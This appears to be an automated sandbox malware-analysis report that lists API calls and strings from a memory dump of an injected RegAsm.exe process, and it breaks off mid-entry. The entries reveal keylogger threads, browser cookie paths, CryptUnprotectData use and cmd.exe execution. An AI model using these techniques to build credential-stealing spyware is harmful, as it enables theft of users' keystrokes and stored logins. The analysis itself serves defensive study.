                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                • String ID: XQG$NG$PG
                                                • API String ID: 1634807452-3565412412
                                                • Opcode ID: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                • Opcode Fuzzy Hash: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                • _free.LIBCMT ref: 10004CE8
                                                • _free.LIBCMT ref: 10004CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                • API String ID: 2506810119-1068371695
                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                • _free.LIBCMT ref: 004435E0
                                                • _free.LIBCMT ref: 004435EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                • API String ID: 2506810119-1068371695
                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,68491986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                • API String ID: 368326130-3219657780
                                                • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                APIs
                                                • _wcslen.LIBCMT ref: 00416330
                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wcslen$CloseCreateValue
                                                • String ID: !D@$okmode$PG
                                                • API String ID: 3411444782-3370592832
                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                APIs
                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                Strings
                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                • API String ID: 1174141254-1980882731
                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                APIs
                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                Strings
                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                • API String ID: 1174141254-1980882731
                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                APIs
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTimewsprintf
                                                • String ID: Offline Keylogger Started
                                                • API String ID: 465354869-4114347211
                                                • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                APIs
                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTime$wsprintf
                                                • String ID: Online Keylogger Started
                                                • API String ID: 112202259-1258561607
                                                • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                APIs
                                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: CryptUnprotectData$crypt32
                                                • API String ID: 2574300362-2380590389
                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandleObjectSingleWait
                                                • String ID: Connection Timeout
                                                • API String ID: 2055531096-499159329
                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw
                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                • API String ID: 2005118841-1866435925
                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                APIs
                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                • RegSetValueExW.ADVAPI32 ref: 00413888
                                                • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: pth_unenc
                                                • API String ID: 1818849710-4028850238
                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                • String ID: bad locale name
                                                • API String ID: 3628047217-1405518554
                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeHandleLibraryModule
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 662261464-1276376045
                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                APIs
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                • String ID: !D@
                                                • API String ID: 186401046-604454484
                                                • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: /C $cmd.exe$open
                                                • API String ID: 587946157-3896048727
                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                APIs
                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: TerminateThread$HookUnhookWindows
                                                • String ID: pth_unenc
                                                • API String ID: 3123878439-4028850238
                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                APIs
                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetCursorInfo$User32.dll
                                                • API String ID: 1646373207-2714051624
                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                APIs
                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetLastInputInfo$User32.dll
                                                • API String ID: 2574300362-1519888992
                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
